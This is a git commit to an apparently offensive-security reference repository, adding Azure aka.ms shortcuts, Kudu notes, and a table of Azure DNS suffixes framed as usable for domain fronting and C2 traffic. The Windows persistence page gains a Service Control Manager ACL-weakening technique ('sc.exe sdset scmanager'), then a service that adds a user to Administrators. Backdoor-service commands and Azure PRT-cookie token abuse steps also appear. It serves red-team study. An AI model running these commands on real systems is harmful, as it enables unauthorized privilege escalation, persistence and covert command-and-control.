aka.ms + Kudu + Azure Services + Service Security Descriptor

pull/18/head
Swissky 2024-09-14 23:55:18 +02:00
parent 235dcaf882
commit bf3c6c4875
7 changed files with 214 additions and 8 deletions

103
docs/cloud/azure/aka-ms.md Normal file
View File

@ -0,0 +1,103 @@
# aka.ms Shortcuts
aka.ms is a URL shortening service used by Microsoft. It is commonly employed to create short, easily shareable links that redirect users to longer or more complex URLs, typically related to Microsoft services, products, or resources.
## Azure Active Directory - Admins
|aka.ms|Command|Portal Blade|
|-----|----|---|
|[aka.ms/ad/ca](https://aka.ms/ad/ca)|ca|Conditional Access|
|[aka.ms/ad/cawhatif](https://aka.ms/ad/cawhatif)|cawhatif|Conditional Access What If|
|[aka.ms/ad/pim](https://aka.ms/ad/pim)|pim|Privileged Identity Management|
|[aka.ms/ad/users](https://aka.ms/ad/users)|users|Users|
|[aka.ms/ad/groups](https://aka.ms/ad/groups)|groups|Groups|
|[aka.ms/ad/devices](https://aka.ms/ad/devices)|devices|Devices|
|[aka.ms/ad/apps](https://aka.ms/ad/apps)|apps|Enterprise Applications|
|[aka.ms/ad/appreg](https://aka.ms/ad/appreg)|appreg|Application Registrations|
|[aka.ms/ad/auth](https://aka.ms/ad/auth)|auth|Authentication Methods Policies|
|[aka.ms/ad/legacymfa](https://aka.ms/ad/legacymfa)|legacymfa|Legacy MFA|
|[aka.ms/ad/guests](https://aka.ms/ad/guests)|guests|Guest Access Settings|
|[aka.ms/ad/logs](https://aka.ms/ad/logs)|logs|Sign in Logs|
|[aka.ms/ad/xtap](https://aka.ms/ad/xtap)|xtap|Cross Tenant Access Settings|
|[aka.ms/ad/roles](https://aka.ms/ad/roles)|roles|Azure AD Roles|
|[aka.ms/ad/sspr](https://aka.ms/ad/sspr)|sspr|Password Reset|
|[aka.ms/ad/security](https://aka.ms/ad/security)|security|Security|
|[aka.ms/ad/mfaunblock](https://aka.ms/ad/mfaunblock)|mfaunblock|MFA Unblock|
|[aka.ms/ad/reviews](https://aka.ms/ad/reviews)|reviews|Access Reviews|
|[aka.ms/ad/score](https://aka.ms/ad/score)|score|Secure Score|
|[aka.ms/ad/license](https://aka.ms/ad/license)|license|Licenses|
|[aka.ms/ad/synclog](https://aka.ms/ad/synclog)|synclog|AAD Connect Sync Errors|
|[aka.ms/ad/adfslog](https://aka.ms/ad/adfslog)|adfslog|ADFS Log|
|[aka.ms/ad/consent](https://aka.ms/ad/consent)|consent|Consents and Permissions|
|[aka.ms/ad/support](https://aka.ms/ad/support)|support|Support|
|[aka.ms/ad/list](https://aka.ms/ad/list)|list|List all these shortcuts|
## Microsoft Admin Portals
|aka.ms|Command|Page|
|-----|----|---|
|[aka.ms/admin](https://aka.ms/admin)|admin|[M365 Admin Portal](https://admin.microsoft.com)|
|[aka.ms/azad](https://aka.ms/azad)|azad|[Azure AD Portal](https://portal.azure.com)|
|[aka.ms/ge](https://aka.ms/ge)|ge|[Graph Explorer](https://developer.microsoft.com/graph/graph-explorer)|
|[aka.ms/intune](https://aka.ms/intune)|intune|[Intune](https://endpoint.microsoft.com)|
|[aka.ms/ppac](https://aka.ms/ppac)|ppac|[Power Platform](https://admin.powerplatform.microsoft.com/)|
## Microsoft Intune Portals
|aka.ms|Command|Page|
|-----|----|---|
|[aka.ms/in](https://aka.ms/in)|in|Intune admin center|
|[aka.ms/intuneshd](https://aka.ms/intuneshd)|intuneshd|Intune service health|
|[aka.ms/intunesupport](https://aka.ms/intunesupport)|support|Get Intune Support|
|[aka.ms/enrollmymac](https://aka.ms/enrollmymac)|enrollmymac|Download the Intune Company Portal for Macs|
## Microsoft 365 Defender
|aka.ms|Command|Portal Blade|
|-----|----|---|
|[aka.ms/de](https://aka.ms/de)|de|Microsoft 365 Defender|
|[aka.ms/de/incidents](https://aka.ms/de/incidents)|incidents|Incidents|
|[aka.ms/de/hunting](https://aka.ms/de/hunting)|hunting|Hunting|
|[aka.ms/de/actions](https://aka.ms/de/actions)|actions|Action Center|
|[aka.ms/de/explorer](https://aka.ms/de/explorer)|explorer|Explorer|
## Microsoft User Portals
|aka.ms|Page|
|-----|---|
|[aka.ms/sspr](https://aka.ms/sspr)|Self Service Password Reset|
|[aka.ms/mysecurity](https://aka.ms/mysecurity)|My Security|
|[aka.ms/myapps](https://aka.ms/myapps)|My Apps|
|[aka.ms/my-account](https://aka.ms/my-account)|My Account|
|[aka.ms/my-groups](https://aka.ms/my-groups)|My Groups|
|[aka.ms/my-access](https://aka.ms/my-access)|My Access Packages|
|[aka.ms/mystaff](https://aka.ms/mystaff)|My Access Packages|
|[aka.ms/mfasetup](https://aka.ms/mfasetup)|Alternative for My Security|
## Identity Protection
|aka.ms|Page|
|-----|---|
|[aka.ms/identityprotection](https://aka.ms/identityprotection)|Identity Protection|
## Winget (Windows Package Manager)
|aka.ms|Page|
|-----|---|
|[aka.ms/getwinget](https://aka.ms/getwinget)|Get Winget Installer|
|[aka.ms/winget-docs](https://aka.ms/winget-docs)|Winget Documentation|
|[aka.ms/winget](https://aka.ms/winget)|Winget Packages (Github Repo)|
## Miscellaneous
|aka.ms|Page|
|-----|---|
|[aka.ms/entradeprecations](https://aka.ms/entradeprecations)|Entra/Azure AD related retirements/deprecations|
|[aka.ms/entratemplates](https://aka.ms/entratemplates)|Email templates & posters to roll out Azure Active Directory features|
|[aka.ms/Fileshare Migration](https://aka.ms/odsp-mm-fs)|Fileshare Migration Portal|
## References
* [microsoft/aka - GitHub - microsoftopensource](https://github.com/microsoft/aka)
* [levid0s/AzurePortals - levid0s - 2019](https://github.com/levid0s/AzurePortals)

View File

@ -1,4 +1,4 @@
# Azure AD - Tokens # Azure AD - Access and Tokens
## Connection ## Connection
@ -322,7 +322,7 @@ MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joine
* Request a nonce from AAD: `roadrecon auth --prt-init -t <tenant-id>` * Request a nonce from AAD: `roadrecon auth --prt-init -t <tenant-id>`
* Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof) to initiate a new PRT request. * Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof) to initiate a new PRT request.
* `roadrecon auth --prt-cookie <prt-cookie> --tokens-stdout --debug` or `roadtx gettoken --prt-cookie <x-ms-refreshtokencredential>` * `roadrecon auth --prt-cookie <prt-cookie> --tokens-stdout --debug` or `roadtx gettoken --prt-cookie <x-ms-refreshtokencredential>`
* Then browse to [login.microsoftonline.com](login.microsoftonline.com) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>` * Then browse to [login.microsoftonline.com](https://login.microsoftonline.com) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>`
```powershell ```powershell
Name: x-ms-RefreshTokenCredential Name: x-ms-RefreshTokenCredential
Value: <Signed JWT> Value: <Signed JWT>

View File

@ -1,4 +1,4 @@
# Azure AD - Azure AD Connect # Azure AD - AD Connect and Cloud Sync
| Active Directory | Azure AD | | Active Directory | Azure AD |
|-----------------------------------|-------------------| |-----------------------------------|-------------------|

View File

@ -30,7 +30,6 @@ Subscriptions:
* **Core Domain**: The initial domain name <tenant>.onmicrosoft.com is the core domain. It is possible to define custom domain names too. * **Core Domain**: The initial domain name <tenant>.onmicrosoft.com is the core domain. It is possible to define custom domain names too.
## References ## References
* [Az - Permissions for a Pentest - HackTricks](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-permissions-for-a-pentest) * [Az - Permissions for a Pentest - HackTricks](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-permissions-for-a-pentest)

View File

@ -6,6 +6,7 @@
az webapp list az webapp list
``` ```
## Execute Commands ## Execute Commands
```ps1 ```ps1
@ -19,6 +20,7 @@ Invoke-AzureRMWebAppShellCommand `
-Command "whoami" -Command "whoami"
``` ```
## SSH Connection ## SSH Connection
First check if the SSH over HTTP connection is enabled: `(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode` First check if the SSH over HTTP connection is enabled: `(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode`
@ -29,6 +31,25 @@ az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-g
``` ```
## Kudu
In Azure App Service, Kudu is the advanced management and deployment tool used for various operations such as continuous integration, troubleshooting, and diagnostic tasks for your web applications. It provides a set of utilities and features for managing your apps environment, including access to application settings, log streams, and deployment management.
You can access this Kudu app at the following URLs:
* App not in the Isolated tier: `https://<app-name>.scm.azurewebsites.net`
* Internet-facing app in the Isolated tier (App Service Environment): `https://<app-name>.scm.<ase-name>.p.azurewebsites.net`
* Internal app in the Isolated tier (App Service Environment for internal load balancing): `https://<app-name>.scm.<ase-name>.appserviceenvironment.net`
Key Features of Kudu in App Service:
* **Web-Based Console**: Provides a command-line interface (CLI) to execute commands directly on the App Service environment.
* **File Explorer**: Lets you view and manage files in your apps environment.
* **Environment Diagnostics**: Offers insights into the environment variables, app settings, and detailed diagnostic logs.
* **Process Explorer**: Allows you to monitor and manage running processes in your apps environment.
* **Access to Logs**: Easily view, download, and stream logs for debugging and troubleshooting.
## References ## References
* [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab) * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)

View File

@ -0,0 +1,40 @@
# Azure Services - DNS Suffix
## DNS table
Many Azure services generate custom endpoints with a suffix such as `.cloudapp.azure.com`, `.windows.net`. Below is a table of common services and their associated DNS suffixes.
These services can also be leveraged for domain fronting or communication with an external C2 server when they are whitelisted by the proxy or the firewall rules.
| Service | Domain |
| --- | --- |
| Analysis Services Suffix | .asazure.windows.net |
| API Management Suffix | .azure-api.net |
| App Services Suffix | .azurewebsites.net |
| Automation Suffix | .azure-automation.net |
| Batch Suffix | .batch.azure.com |
| Blob Endpoint Suffix | .blob.core.windows.net |
| CDN Suffix | .azureedge.net |
| Data Lake Analytics Catalog Suffix | .azuredatalakeanalytics.net |
| Data Lake Store Suffix | .azuredatalakestore.net |
| DocumentDB/CosmosDB Suffix | .documents.azure.com |
| Event Hubs Suffix | .servicesbus.windows.net |
| File Endpoint Suffix | .file.core.windows.net |
| FrontDoor Suffix | .azurefd.net |
| IoT Hub Suffix | .azure-devices.net |
| Key Vault Suffix | .vault.azure.net |
| Logic App Suffix | .azurewebsites.net |
| Queue Endpoint Suffix | .queue.core.windows.net |
| Redis Cache Suffix | .redis.cache.windows.net |
| Service Bus Suffix | .servicesbus.windows.net |
| Service Fabric Suffix | .cloudapp.azure.com |
| SQL Database Suffix | .database.windows.net |
| Storage Endpoint Suffix | .core.windows.net |
| Table Endpoint Suffix | .table.core.windows.net |
| Traffic Manager Suffix | .trafficmanager.net |
| Web Application Gateway Suffix | .cloudapp.azure.com |
## References
* [Azure services URLs and IP addresses for firewall or proxy whitelisting - Daniel Neumann - 20. December 2016](https://www.danielstechblog.io/azure-services-urls-and-ip-addresses-for-firewall-or-proxy-whitelisting/)

View File

@ -19,10 +19,11 @@
* [Windows Service](#windows-service) * [Windows Service](#windows-service)
* [Elevated](#elevated) * [Elevated](#elevated)
* [Registry HKLM](#registry-hklm) * [Registry HKLM](#registry-hklm)
* [Winlogon Helper DLL](#) * [Winlogon Helper DLL](#winlogon-helper-dll)
* [GlobalFlag](#) * [GlobalFlag](#globalflag)
* [Startup Elevated](#startup-elevated) * [Startup Elevated](#startup-elevated)
* [Services Elevated](#services-elevated) * [Services Elevated](#services-elevated)
* [Service Security Descriptor](#servicesecuritydescriptor)
* [Scheduled Tasks Elevated](#scheduled-tasks-elevated) * [Scheduled Tasks Elevated](#scheduled-tasks-elevated)
* [Binary Replacement](#binary-replacement) * [Binary Replacement](#binary-replacement)
* [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp) * [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp)
@ -321,7 +322,7 @@ Create a service that will start automatically or on-demand.
```powershell ```powershell
# Powershell # Powershell
New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here." -StartupType Automatic New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here." -StartupType Automatic
sc start pentestlab sc start Backdoor
# SharPersist # SharPersist
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c backdoor.exe" -n "Backdoor" -m add SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c backdoor.exe" -n "Backdoor" -m add
@ -331,6 +332,46 @@ sc create Backdoor binpath= "cmd.exe /k C:\temp\backdoor.exe" start="auto" obj="
sc start Backdoor sc start Backdoor
``` ```
### ServiceSecurityDescriptor
Allow any arbitrary non-administrative user to have full SYSTEM permissions on a machine persistently by feeding an overly permissive ACL to the service control manager with sdset.
**Exploit**:
```ps1
sc.exe sdset <ServiceName> <ServiceSecurityDescriptor>
```
The following command grants full control (`Key Access`) over the Service Control Manager to all users (represented by `WD`, which stands for "World"). In other words, it allows any user to start, stop, modify, or control services through the Service Control Manager, which can be a security risk as it opens service management to everyone on the system.
```ps1
sc.exe sdset scmanager D:(A;;KA;;;WD)
```
* `sc.exe`: The Service Control (sc) command is a Windows utility used for managing services.
* `sdset`: This option sets a Security Descriptor (SD) for a service or the Service Control Manager itself. A security descriptor defines permissions and access rights to system resources.
* `scmanager`: This is the target, referring to the Service Control Manager, which manages the services in the system.
The `ServiceSecurityDescriptor` is defined using the Service Descriptor Definition Language (SDDL).
List the permissions for `scmanager`
```ps1
sc.exe sdshow scmanager
```
Alternatively, you can use [zacateras/sddl-parser](https://github.com/zacateras/sddl-parser) to understand the Security Descriptor Definition Language (SDDL), e.g: `./Sddl.Parser.Console.exe "O:BAG:BAD:(A;CI;CCDCRP;;;NS)"`.
Abuse the weaken configuration to create a service that grants administrator privilege to a custom user `user_basic`.
```ps1
sc create LPE displayName= "LPE" binPath= "C:\Windows\System32\net.exe localgroup Administrators user_basic /add" start= auto
```
Then you need to wait for a reboot for the service to automatically start and grant the user with elevated privilege or any persistence mechanism you specified in the `binPath`.
### Scheduled Tasks Elevated ### Scheduled Tasks Elevated
Scheduled Task to run as SYSTEM, everyday at 9am or on a specific day. Scheduled Task to run as SYSTEM, everyday at 9am or on a specific day.
@ -580,3 +621,5 @@ Set-DomainObject -Identity <target_machine> -Set @{"ms-mcs-admpwdexpirationtime"
* [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/) * [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/)
* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/) * [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/)
* [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html) * [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html)
* [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/)
* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11))